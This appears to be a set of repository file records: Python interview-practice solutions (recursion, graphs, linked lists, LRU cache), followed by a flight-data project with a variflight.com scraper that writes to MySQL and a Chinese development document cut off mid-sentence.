"text": "\"\"\"\nThe Tribonacci sequence Tn is defined as follows:\n\nT0 = 0, T1 = 1, T2 = 1, and Tn+3 = Tn + Tn+1 + Tn+2 for n >= 0.\n\nGiven n, return the value of Tn.\n\n\"\"\"\n\n# Normal recursion\ndef tribonacci(n):\n\n if n == 0:\n return 0\n elif n == 1 or n == 2:\n return 1\n else:\n return tribonacci(n-1) + tribonacci(n-2) + tribonacci(n-3)\n\n# top down\ndef tribonacci2(n):\n\n a, b, c = 0, 1, 1\n\n for _ in range(n-2):\n a, b, c = b, c, a + b + c\n print(a, b, c)\n\n return c\n\n\n# with memoization\nh_map = {0: 0, 1: 1, 2: 1}\ndef tribonacci3(n):\n\n\n if n in h_map:\n return h_map[n]\n else:\n value = tribonacci3(n-1) + tribonacci3(n-2) + tribonacci3(n-3)\n h_map[n] = value\n return value\n\ndef tribonacci4(n):\n hmap = {0: 0, 1: 1, 2: 1}\n\n def trib(n):\n if n in hmap:\n return hmap[n]\n else:\n value = trib(n - 1) + trib(n - 2) + trib(n - 3)\n hmap[n] = value\n return value\n\n return trib(n)\n\nprint(tribonacci3(500))\n"
},
{
"alpha_fraction": 0.5922242403030396,
"alphanum_fraction": 0.6311030983924866,
"avg_line_length": 18.421052932739258,
"blob_id": "66ca66c09daf5d87ecce217593becbf0f32f0b78",
"content_id": "ead4ba81e345407e2e089edb672e6e90f495acca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1146,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 57,
"path": "/Interview1_1/11_17.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "\"\"\"\nGiven a set of integers, find the maximum sum of values that are under a weight W.
\ne.g.
vals = [ 7, 10, 4, 3, 17, 8 ]
W = 5
Solution: 4
OR
\nvals = [ 7, 10, 4, 3, 17, 8 ]
W = 19
solution: 18
\nBONUS:
Bonus 1: Return the maximum subset under the given weight
\nBonus 2: Ensure that no sub problem is calculated more than once
\n\"\"\"\n\n\"\"\"\nSol\nbase: if index >= len(val) or if sum > W:\nreturn 0\n\nmax_val\n\nrecursive step:\n value1 = 0\n value1 = sum[set] + max_val(val[1:], set, W, index) #\n value2 = max_val(val, set, W, index+1)\n \n return max(value1, value2)\n\"\"\"\n\ndef maximum_value(val, W):\n return max_possible(val,[], W, 0)\n\ndef max_possible(val,combination, W, index):\n # base case\n if index >= len(val) or sum(combination) <= W:\n return 0\n\n combination = combination.append(val[index])\n # recursive step\n value1 = 0\n # value1 = val[index] + max_possible(val, combination.append(val[index]), W, index+1)\n # value1 = sum(combination) + max_possible(val, combination.append(val[index]), W, index+1)\n value2 = max_possible(val, combination, W, index+1)"
},
{
"alpha_fraction": 0.6232227683067322,
"alphanum_fraction": 0.6398104429244995,
"avg_line_length": 18.18181800842285,
"blob_id": "e5b75202cb7f0b2bd07255a881dfba9bcbec6d80",
"content_id": "a8ff478d554973643b3f89a6fe73d3e72a80d46b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 422,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 22,
"path": "/Recursion_DP/BbB/reversell.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# from sam\n# reverse a LL\n\nclass Node:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\ndef printreverseLL(head):\n if head == None:\n return\n printreverseLL(head.next)\n print(head.val)\n\n#Creating a linked list\nhead = Node(2)\nhead.next = Node(4)\nhead.next.next = Node(6)\nhead.next.next.next = Node(8)\nhead.next.next.next.next = Node(10)\n\nprint(printreverseLL(head))\n"
},
{
"alpha_fraction": 0.567415714263916,
"alphanum_fraction": 0.5852059721946716,
"avg_line_length": 19.941177368164062,
"blob_id": "ffc3b169bb47d75cca0f0ebbd61794cdacf48845",
"content_id": "ec259809d1c040c3e0d3d74f6fb0d7be8231fff7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1068,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 51,
"path": "/Graphs/LC/841. Keys and Rooms.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# I have to find whether i am able to reach all the doors starting from zero\n\n\"\"\"\n\nInput: [[1],[2],[3],[]]\n\nOutput: boolean (T/F)\n\n\"\"\"\n\n\"\"\"\nMy approach\napply DFS to the solution \n create a list remaining = from [1..len(graph)-1]\n \n indicator while all the nodes are traversed and remaining \nif neighbour in remaing: \n remainig.remove(neighbour)\n\nreturn len(remaining) == 0\n\n\"\"\"\n\n# Runtime = O(V+E)\n#def canVisitAllRooms(self, rooms: List[List[int]]) -> bool:\ndef canVisitAllRooms(rooms):\n rem_rooms = [i for i in range(1, len(rooms))]\n\n visited = set()\n def dfs(r, key):\n stack = [key]\n\n while stack and rem_rooms:\n element = stack.pop()\n if element in rem_rooms:\n rem_rooms.remove(element)\n\n if element not in visited:\n visited.add(element)\n\n for neighbour in rooms[element]:\n stack.append(neighbour)\n\n dfs(rooms, 0)\n\n return len(rem_rooms) == 0\n\n\n#rooms = [[1],[2],[3],[]]\nrooms = [[1,3],[3,0,1],[2],[0]]\nprint(canVisitAllRooms(rooms))\n"
},
{
"alpha_fraction": 0.574999988079071,
"alphanum_fraction": 0.58423912525177,
"avg_line_length": 29.11475372314453,
"blob_id": "e29dbf0ed6f02e116c3ad705c4074aaf98baaf1f",
"content_id": "7af4d4c9a044c90742c7aeb8d36e4ac399d3d445",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1841,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 61,
"path": "/Linked_List/16.25 LRU Cache.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "\"\"\"\nFrom CTCI\n\nLRU Cache: Design and build a \"least recently used\" cache, which evicts the least recently used item.\nThe cache should map from keys to values (allowing you to insert and retrieve a value associ ated\nwith a particular key) and be initialized with a max size. When it is full,\nit should evict the least recently used item.\n\n\"\"\"\n\n\"\"\"\nFrom Leet code\n\nDesign a data structure that follows the constraints of a Least Recently Used (LRU) cache.\n\nImplement the LRUCache class:\n\nLRUCache(int capacity) Initialize the LRU cache with positive size capacity.\nint get(int key) Return the value of the key if the key exists, otherwise return -1.\nvoid put(int key, int value) Update the value of the key if the key exists. Otherwise, add the key-value pair \nto the cache. If the number of keys exceeds the capacity from this operation, evict the least recently used key.\nFollow up:\nCould you do get and put in O(1) time complexity?\n\n\"\"\"\n\n# normal first method My method\n\ndef lru_cache(keys_list):\n capacity = 4\n cache = dict()\n size = len(cache)\n age = 0\n min = 0\n\n for process in keys_list:\n if process in cache:\n age += 1\n cache[process] = age\n else:\n if size < capacity:\n #print(size)\n size += 1\n age += 1\n cache[process] = age\n else:\n min = float(\"inf\")\n for key, value in cache.items():\n if value < min:\n min = value\n for key, value in cache.items():\n if value == min:\n remove_key = key\n break\n del cache[key]\n age += 1\n cache[process] = age\n\n return cache\n\nprint(lru_cache([1,2,3,4,5,2,4,6]))\n\n\n\n"
},
{
"alpha_fraction": 0.5155172348022461,
"alphanum_fraction": 0.517241358757019,
"avg_line_length": 20.407407760620117,
"blob_id": "2792c80d790b766791224c50fcb896422b4e0a7a",
"content_id": "5502d3c6ebb91fad2d5891c14ec430f595eea54f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 580,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 27,
"path": "/Graphs/Graph_BFS.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# Traversing the graph using Breadth first search (BFS)\n\nvisited = set()\n\ndef bfs(visited, graph, node):\n queue = []\n queue.append(node)\n\n while queue:\n element = queue.pop(0)\n if element not in visited:\n print(element)\n visited.add(element)\n for neighbour in graph[element]:\n queue.append(neighbour)\n\n# Using a Python dictionary to act as an adjacency list\ngraph = {\n 'A' : ['B','C'],\n 'B' : ['D', 'E'],\n 'C' : ['F'],\n 'D' : [],\n 'E' : ['F'],\n 'F' : []\n}\n\nprint(bfs(visited, graph, 'A'))\n\n\n"
},
{
"alpha_fraction": 0.41784989833831787,
"alphanum_fraction": 0.4716024398803711,
"avg_line_length": 17.980770111083984,
"blob_id": "d7f4e2e5bd3c78f00b0b83a563c0c220afcb3a32",
"content_id": "b85e2270deeb6e2658b733e305f38257e1514d9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 986,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 52,
"path": "/Graphs/LC/200. Number of Islands.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# finding the number of islands\n\n\"\"\"\nInput: grid = [\n [\"1\",\"1\",\"1\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"0\",\"0\",\"0\",\"0\",\"0\"]\n]\nOutput: 1\n\n\"\"\"\n\n\"\"\"\nwe will iterate through each cell and mark the adjacent islands and return if it is an island\n\nrecursively\n\"\"\"\n\n\n#def numIslands(self, grid: List[List[str]]) -> int:\ndef numIslands(grid):\n\n # checking if grid is not None\n if not grid:\n return None\n count = 0\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == '1':\n dfs(grid, i, j)\n count += 1\n\n return count\n\ndef dfs(grid, i, j):\n if i<0 or j<0 or i>=len(grid) or j>=len(grid[0]) or grid[i][j] != '1': \n return\n grid[i][j] = '#'\n dfs(grid, i-1, j)\n dfs(grid, i, j-1)\n dfs(grid, i+1, j)\n dfs(grid, i, j+1)\n\n\ngrid = [\n [\"1\",\"1\",\"1\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"0\",\"0\",\"0\",\"0\",\"0\"]\n]\nprint(numIslands(grid))"
},
{
"alpha_fraction": 0.5671902298927307,
"alphanum_fraction": 0.5811518430709839,
"avg_line_length": 19.235294342041016,
"blob_id": "96309e63576a0aaee7a42b36a985921509a17ce2",
"content_id": "d82ad2b696344ee9c5e5de82e5cca04af4db01b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1719,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 85,
"path": "/Linked_List/LC/148. Sort List.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# sort a linked list\n\n\"\"\"\nGiven the head of a linked list, return the list after sorting it in ascending order.\n\"\"\"\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n# normal method\n\"\"\"\nconvert the linkedlist to array and then sort and return it\n\"\"\"\ndef sortList(head):\n curr = head\n result = []\n while curr:\n result.append(curr.val)\n curr = curr.next\n\n result.sort()\n # print(result, resultll)\n resultll = curr = ListNode()\n\n for i in result:\n curr.next = ListNode(val=i)\n curr = curr.next\n\n return resultll.next\n\n# In place list sorting method\n\"\"\"\nApply 2 methods first divide into halves and merge the 2 linked lists\nFollow up: Can you sort the linked list in O(n logn) time and O(1) memory (i.e. constant space)?\n\"\"\"\n\ndef sortList(head):\n\n # returns the sorted list\n def mergelist(l1, l2):\n dummy = curr = ListNode()\n\n while l1 and l2:\n if l1.val < l2.val:\n curr.next = l1\n l1 = l1.next\n else:\n curr.next = l2\n l2 = l2.next\n curr = curr.next\n curr.next = l1 or l2\n\n return dummy.next\n\n # returns middle value and its preceeding ones\n def midlenode(head):\n fastp = slowp = head\n\n while fastp.next and fastp:\n fastp = fastp.next.next\n slowp = slowp.next\n\n return slowp\n\n mid = midlenode(head)\n left = head\n right = mid\n\n return mergelist(left, right)\n\n\n\n\n\n\n\n\n\n# Creating a linked list\n# head = Node(2)\n# head.next = Node(4)\n# head.next.next = Node(6)\n# head.next.next.next = Node(8)\n# head.next.next.next.next = Node(10)"
},
{
"alpha_fraction": 0.6191446185112,
"alphanum_fraction": 0.6415478587150574,
"avg_line_length": 27.941177368164062,
"blob_id": "6432a0c3992552346b7bff30f72c4980422c513e",
"content_id": "141dafdf9d33f801b34304509d47a309432c7397",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 491,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 17,
"path": "/Recursion_DP/8.1 Triple Step.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "\"\"\"\nA child is running up a staircase with n steps and can hop either 1 step, 2 steps, or 3\nsteps at a time. Implement a method to count how many possible ways the child can run up the stairs.\n\n\"\"\"\n\ndef tripleStep(n):\n if n < 0:\n return 0\n if n == 0:\n return 1\n else:\n return tripleStep(n-3) + tripleStep(n-2) + tripleStep(n-1)\n # We multiply the values when it's \"we do this then this:' We add them when it's \"we do this or this:'\n\n\nprint(tripleStep(3))"
},
{
"alpha_fraction": 0.576724112033844,
"alphanum_fraction": 0.5956896543502808,
"avg_line_length": 19.36842155456543,
"blob_id": "d28c0010d8f036a0e1bbe027a2546c91a58532fa",
"content_id": "f77a046e5dd58e63d5d23dc13d00eaf1085df145",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1160,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 57,
"path": "/Arrays_Strings/LC/1. Two Sum.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# finding if the sum is equal to the target\n\n\"\"\"\nGiven an array of integers nums and an integer target, return indices of the\ntwo numbers such that they add up to target.\n\"\"\"\n\n\n\"\"\"\nexample\nnums = [2,7,11,15], target = 9\nresult = [0,1]\n\"\"\"\n\nfrom collections import defaultdict\n\n\n# O(n^2)\n# def twoSum(nums, target):\n#\n# # res = []\n#\n# for i in range(len(nums)-1):\n# for j in range(i+1,len(nums)):\n# if nums[i] + nums[j] == target:\n# return [i,j]\n#\n\n\"\"\"\nif i have a hash table i can find by\n\nfor number in list\ntarget - number find in hash table\n\n\"\"\"\n\n# O(n+n) as takes time to convert to hash table\ndef twoSum2(nums, target):\n\n hashtab = dict(zip(nums, [i for i in range(len(nums))]))\n #print(hashtab)\n for i,vali in enumerate(nums):\n found = hashtab.get(target-vali)\n if found and (i != hashtab[target-vali]):\n return [i,found]\n\n#\ndef twoSum3(nums, target):\n\n list_dict = {}\n for i in range(len(nums)):\n compliment = target - nums[i]\n if compliment in list_dict:\n return list_dict[compliment], i\n list_dict[nums[i]] = i\n\nprint(twoSum3([2,7,11,15], 9))"
},
{
"alpha_fraction": 0.5801687836647034,
"alphanum_fraction": 0.597046434879303,
"avg_line_length": 15.964285850524902,
"blob_id": "ea63420f2b78cb35edd80110cb4d1662c138264e",
"content_id": "8f31dad6e3a9b448c610be6501a833ccea46b353",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 474,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 28,
"path": "/Recursion_DP/BbB/is Palindrome.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# is palindrome\n\n# recursively\n\ndef palindrome(s):\n\n if len(s) == 0:\n return True\n\n return isPalindrome(s, 0, len(s)-1)\n\ndef isPalindrome(s, start, end):\n\n # base case 1 if it reaches 1 element in odd sceanrio\n if start == end:\n return True\n\n # base case 2 if it isn't palindrome\n if s[start] != s[end]:\n return False\n\n if start < end:\n return isPalindrome(s, start + 1, end - 1)\n\n return True\n\n\nprint(palindrome(\"nitin\"))"
}
] | 37 |
khunkin/Flight_Data_Analysis_And_Visualization
|
https://github.com/khunkin/Flight_Data_Analysis_And_Visualization
|
aca646f07b63e27483351a9f2649ef6b85917c4b
|
a992aa10a6f12ccccc51299dbe943202bf4f530f
|
64f58d7f894aa686872184c7df7bae862a3077ca
|
refs/heads/master
| 2020-03-28T09:26:52.449595 | 2018-09-10T09:04:24 | 2018-09-10T09:04:24 | 148,037,657 | 2 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.2586206793785095,
"alphanum_fraction": 0.5517241358757019,
"avg_line_length": 58,
"blob_id": "ffbdd9a6a4cdd29b8893ea5c60bd5814c55d1c41",
"content_id": "66d2108d16aad8dce84bddf6590fb239d43874f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 58,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 1,
"path": "/data/company_delay.js",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "var company_delay = [29, 25, 2, 29, 10, 14, 4, 0, 28, 23];"
},
{
"alpha_fraction": 0.410675048828125,
"alphanum_fraction": 0.4503401219844818,
"avg_line_length": 29.029220581054688,
"blob_id": "cbaf99c6013240d6977d1c1af324e0dcb9a7a731",
"content_id": "2100d107333a612b6238312398d213834e1e214d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9803,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 308,
"path": "/spider.py",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "from urllib.request import urlopen\r\nfrom urllib.request import urlretrieve\r\nfrom urllib import request\r\nimport requests\r\nfrom lxml import etree\r\nimport numpy as np\r\nimport pymysql as sql\r\nimport re\r\nimport pandas as pd\r\nimport time\r\nimport sys\r\n\r\n\r\n\"\"\"\r\n# 直接调用CSV获取国内机场三字码\r\n\r\n查询页面格式:http://www.variflight.com/flight/PEK-PVG.html?AE71649A58c77&fdate=20180827\r\n\"http://www.variflight.com/flight/\"+ str(departure) +\"-\" + str(arrival) + \".html?AE71649A58c77&fdate=\" + str(date)\r\n通过直接修改日期可以查询到很久以前的历史数据\r\n\"\"\"\r\n\r\n## store the data to SQL\r\n\r\n# ==============================================\r\ndef create_table(cur):\r\n cmd = \"DROP TABLE information\"\r\n try:\r\n cur.execute(cmd)\r\n except:\r\n pass\r\n\r\n cmd = (\r\n 'CREATE TABLE information('\r\n '`company` VARCHAR(20),'\r\n '`flight_number` VARCHAR(16),'\r\n '`plane_model` VARCHAR(32),'\r\n '`plane_age` FLOAT,'\r\n '`dplan` INT,'\r\n '`dreal` INT,'\r\n '`dAirport` VARCHAR(20),'\r\n '`aplan` INT,'\r\n '`areal` INT,'\r\n '`aAirport` VARCHAR(20),'\r\n '`distance` INT,'\r\n '`duration` INT,'\r\n '`cond` INT,'\r\n '`date` INT'\r\n ') default charset=utf8')\r\n cur.execute(cmd)\r\n\r\n# =========================================================\r\n\r\n##解析一个页面:\r\n##页面中图片的地址是 www.variflight.com + src\r\n##<-----------! 不封装了, 封装之后性能严重下降 ----------------->\r\ndef parser(url):\r\n\r\n ip_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5\", \\\r\n\t\t\t\t\t\"Referer\": 'http://www.baidu.com'}\r\n req = request.Request(url, headers=ip_headers)\r\n\r\n html = urlopen(req).read().decode('utf-8')\r\n selector = etree.HTML(html)\r\n li_tags = selector.xpath('//*[@id=\"list\"]/li')\r\n web_field_name = 'http://www.variflight.com'\r\n flights = []\r\n cnt = 0\r\n time.sleep(3)\r\n for li_tag in li_tags:\r\n\r\n cnt += 1\r\n print(cnt)\r\n next_url = web_field_name+li_tag.xpath('./a[1]/@href')[0]\r\n\r\n next_ip_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5\", \\\r\n \"Referer\": 'http://www.baidu.com'}\r\n next_req = request.Request(next_url, headers=next_ip_headers)\r\n time.sleep(3)\r\n\r\n next_html = urlopen(next_req).read().decode('utf-8')\r\n next_selector = etree.HTML(next_html)\r\n # distance is a number\r\n distance = next_selector.xpath(\r\n '//div[@class=\"p_ti\"]/span[1]/text()'\r\n )[0]\r\n distance = re.findall(r\"\\d+\\.?\\d*\", distance)[0]\r\n try:\r\n distance = int(distance)\r\n except:\r\n pass\r\n\r\n # duration: [[],[]]\r\n duration = next_selector.xpath(\r\n '//*[@id=\"p_box\"]/div[1]/span[2]/text()'\r\n )[0]\r\n duration = re.findall(r\"\\d+\\.?\\d*\", duration)\r\n duration = [int(duration[0]), int(duration[1])]\r\n\r\n # plane is a number\r\n plane_age = next_selector.xpath(\r\n '//li[@class=\"time\"]/span/text()'\r\n )[0]\r\n plane_age = re.findall(r\"\\d+\\.?\\d*\", plane_age)\r\n plane_age = float(plane_age[0]) if len(plane_age) else 0\r\n\r\n # arrival cond: 3 cases:early、late、cancel\r\n # the time delayed or early\r\n\r\n cond = next_selector.xpath(\r\n '//li[@class=\"age\"]/span/text()'\r\n )[0]\r\n fly_time = re.findall(r\"\\d+\\.?\\d*\", cond)\r\n\r\n # judge cond\r\n if cond.find(\"前\") >= 0:\r\n cond = -1\r\n elif cond.find('晚') >= 0:\r\n cond = 1\r\n else:\r\n cond = 0\r\n\r\n # the time delayed or early\r\n if len(fly_time) == 0:\r\n fly_time = [0,0]\r\n elif len(fly_time) == 1:\r\n fly_time = [0, int(fly_time[0])*cond]\r\n else:\r\n fly_time = [int(t)*cond for t in fly_time]\r\n\r\n # planned departure time\r\n dplan = li_tag.xpath(\r\n './div/span[2]/text()'\r\n )[0].strip()\r\n dplan = re.findall(r\"\\d+\\.?\\d*\", dplan)\r\n dplan = [int(dplan[0]), int(dplan[1])]\r\n\r\n # planned arrival time\r\n aplan = li_tag.xpath(\r\n './div/span[5]/text()'\r\n )[0].strip()\r\n aplan = re.findall(r\"\\d+\\.?\\d*\", aplan)\r\n aplan = [int(aplan[0]), int(aplan[1])]\r\n\r\n # real arrival time\r\n areal = add_time(aplan, fly_time) if cond != 0 else -1\r\n\r\n # real departure time\r\n dreal = add_time(areal, [t*-1 for t in duration]) if cond != 0 else -1\r\n print(aplan, areal)\r\n if areal != -1:\r\n delay = sub_time(aplan[0]*100+aplan[1], areal[0]*100+areal[1])\r\n else:\r\n delay = -1\r\n print(delay)\r\n\r\n flights.append({\r\n 'company' : str(li_tag.xpath('./div/span[1]/b/a[1]/text()')[0]),\r\n 'flight_number' : str(li_tag.xpath('./div/span[1]/b/a[2]/text()')[0]),\r\n 'plane_model' : str(next_selector.xpath('//li[@class=\"mileage\"]/span/text()')[0]),\r\n 'plane_age' : plane_age,\r\n 'dplan' : dplan,\r\n 'dreal' : dreal,\r\n 'dAirport' : str(li_tag.xpath('./div/span[4]/text()')[0]),\r\n 'aplan' : aplan,\r\n 'areal' : areal,\r\n 'aAirport' : str(li_tag.xpath('./div/span[7]/text()')[0]),\r\n 'distance' : distance,\r\n 'duration' : duration,\r\n 'cond' : cond,\r\n 'delay' : delay\r\n })\r\n return flights\r\n\r\n\r\n\r\n# =================================================================================\r\n\r\ndef add_time(time1, time2):\r\n fly_time = [time1[0]+time2[0], time1[1]+time2[1]]\r\n while fly_time[1] < 0:\r\n fly_time[1] += 60\r\n fly_time[0] -= 1\r\n while fly_time[1] >= 60:\r\n fly_time[1] -= 60\r\n fly_time[0] += 1\r\n while(fly_time[0] < 0):\r\n fly_time[0] += 24\r\n while(fly_time[0] >= 24):\r\n fly_time[0] -= 24\r\n return fly_time\r\n\r\n# time1 and time2 is int\r\ndef sub_time(time1, time2):\r\n if time2 == -1:\r\n return -1\r\n h1 = time1 // 100\r\n h2 = time2 // 100\r\n # just can be ude for the route : PEK to CAN \r\n if h2<5 and h1 > 20:\r\n h2 += 24\r\n if h1 < 5 and h2 > 20:\r\n h1 += 24\r\n m1 = time1 % 100\r\n m2 = time2 % 100\r\n m = m2 - m1\r\n h = h2 - h1\r\n if h > 0 and m < 0:\r\n m += 60\r\n h -= 1\r\n return h*60+m\r\n\r\n# ===========================================================\r\n# get chinaAirports data\r\n# csvFile = pd.read_csv(r'data\\chinaAirports.csv',header=None,sep=',', usecols=[1])\r\n# IATAs = np.array(csvFile.loc[1:,:])\r\n# chinaAirports = []\r\n# for IATA in IATAs:\r\n# chinaAirports.append(''.join(IATA))\r\n\r\n# ===========================================================\r\n# proxy pool\r\n# proxys = ['121.9.249.98', '180.104.62.48','123.57.61.38','180.118.247.239', '121.232.194.155','112.243.171.37','101.200.50.18','182.88.188.26','59.62.35.145']\r\n\r\n\r\n# ============================================================\r\n# date = ['2018','09',]\r\n\r\n# for From in chinaAirports:\r\n# for To in chinaAirports:\r\n# if From == To:\r\n# continue\r\n\r\n# url = 'http://www.variflight.com/flight/' + From + '-' + To + '.html?AE71649A58c77&fdate=' + ''.join(date)\r\n\r\n## 上面被注释掉的是留给以后的正式拓展的功能\r\n## 比如爬取多个航线与日期、爬虫伪装\r\n# ==========================================================\r\n# fetch the data and store it\r\n\r\nconn = sql.connect(host='127.0.0.1', user = 'root', password='dddkng5', db='mysql', charset='utf8')\r\ncur = conn.cursor()\r\ncur.execute('USE flights_realtime')\r\n\r\n# create_table(cur)\r\n\r\nlist_type = type([1])\r\nstr_type = type('1')\r\n\r\ndef fetch_the_data(From, To, date):\r\n url = 'http://www.variflight.com/flight/'+From+'-'+To+'.html?AE71649A58c77&fdate='+str(date)\r\n flights = parser(url)\r\n for data in flights:\r\n for key in data.keys():\r\n data_j_type = type(data[key])\r\n if data_j_type == str_type:\r\n data[key] = ''.join(['\\\"',data[key],'\\\"'])\r\n if data_j_type == list_type:\r\n data[key] = data[key][0]*100+data[key][1]\r\n ## 不封装还是因为性能问题.....\r\n\r\n cmd = ('INSERT INTO information ('\r\n 'company, '\r\n 'flight_number, '\r\n 'plane_model, '\r\n 'plane_age, '\r\n 'dplan, '\r\n 'dreal, '\r\n 'dAirport, '\r\n 'aplan, '\r\n 'areal, '\r\n 'aAirport, '\r\n 'distance, '\r\n 'duration, '\r\n 'cond, '\r\n 'date,'\r\n 'delayTime'\r\n ')'\r\n ' VALUES ('\r\n '{0}, {1}, {2}, {3}, {4}, '\r\n '{5}, {6}, {7}, {8}, {9}, '\r\n '{10}, {11}, {12}, {13}, {14})').format(\r\n data['company'],\r\n data['flight_number'],\r\n data['plane_model'],\r\n data['plane_age'],\r\n data['dplan'],\r\n data['dreal'],\r\n data['dAirport'],\r\n data['aplan'],\r\n data['areal'],\r\n data['aAirport'],\r\n data['distance'],\r\n data['duration'],\r\n data['cond'],\r\n str(date),\r\n data['delay']\r\n )\r\n print(cmd)\r\n cur.execute(cmd)\r\n cur.connection.commit()\r\n\r\n\r\n\r\nFrom = sys.argv[1]\r\nTo = sys.argv[2]\r\ndate = sys.argv[3]\r\n\r\nfetch_the_data(From, To, date)"
},
{
"alpha_fraction": 0.7950627207756042,
"alphanum_fraction": 0.8021159768104553,
"avg_line_length": 40.85245895385742,
"blob_id": "91b265c615346fb3cd2aca5c24f909d83955fdda",
"content_id": "72fef3de6341bb940683148ae5268188f7ab1dbc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5460,
"license_type": "no_license",
"max_line_length": 323,
"num_lines": 61,
"path": "/开发文档.md",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "## 航班数据可视化\n\n### 数据\n\n数据来源:\n\n- 静态本地数据集:https://openflights.org/data.html\n- 爬虫爬取:http://www.variflight.com/\n\n### 设计\n\n- 结构梗概:爬虫——数据——Echarts可视化, 前期工作通过Python完成,可视化使用JavaScript、HTML以及Echarts框架完成\n- 爬虫:\n - http://www.variflight.com 的查询网址格式为:\"http://www.variflight.com/flight/\" + departure airport IATA code + \"-\" + arrival airport IATA code + \".html?AE71649A58c77&fdate=\" + date\n - 使用lxml库以及XPath解析网页,获取航班数据,得到公司名称、航班号、计划起飞以及计划到达时间、起始地以及到达地、查询时该航班的状态\n - 由于该网站对实际起降时间做出了反爬虫处理——以临时图片的形式加载,这导致了无法通过OCR技术直接获得该航班实际起降时间,只能通过另一种方式获取实际起降时间:通过访问该航班查询结果所指向的页面,获取延迟时间以及飞行时间计算出实际起降时间\n - 通过以上途径获取某天某条航线的所有航班信息后,通过pymysql库将结果存储到mysql中\n - 不足:反反爬虫还没有做到位,导致爬取速度有限,目前只能爬取一条航班的数据\n- 数据存储:\n - 在存储数据之前,通过Python将原始数据处理成需要的数据,并格式化地将数据存到JSON、CSV或mysql中(依用途而定)\n - 由于还不会搭建本地服务器,JavaScript读取JSON数据只能通过取巧的方式进行:用Python存储数据时,在生成JSON数据外,还将其改存为`var name = 'JSON';`的形式存在.js文件里,相当于直接生成一个变量, 将.js文件引入即可使用吗 \n - CSV和mysql的数据通过Python的pandas module 和 pymysql module进行交互。\n- 数据可视化:\n - 初步观察、分析数据,确定需要展现的数据\n - 通过Echarts框架,将需要展现的数据进行动态可视化处理并通过HTML展现。\n - 通过动态可视化处理,可以更好地展现本次所选的数据的特性,尤其是针对时间序列数据\n\n### 功能\n\n- \n- 由于技术原因,不能实现完全的自动化流程,一些操作需要直接通过修改源码进行\n- 首先需要确定爬取的航线的出发机场IATA码,到达机场IATA码,日期(YYYYMMDD格式, 整型),在命令行以`$ python spider.py departureAirportIATA arrivalAirportIATA date`的格式运行spider.py文件,等待执行完毕后所查询的航班数据就会存放mysql数据库里\n- 之后需要修改cal_realtime.py文件里的数据处理函数\n - 依照已有的函数格式,手动写函数,因为不同的feature对应的数据处理方式略有不一样,特别是sql的查询语句\n - 将数据分析的结果以`var name = 'JSON';`格式化存在.js文件里, 其中JSON部分的格式是:\n - `{date1:[{name:str, value:int}, ..], ..} `\n - 因为算法原因,需要手动修改一下生成的.js文件,将`[{name:str, value:int}, 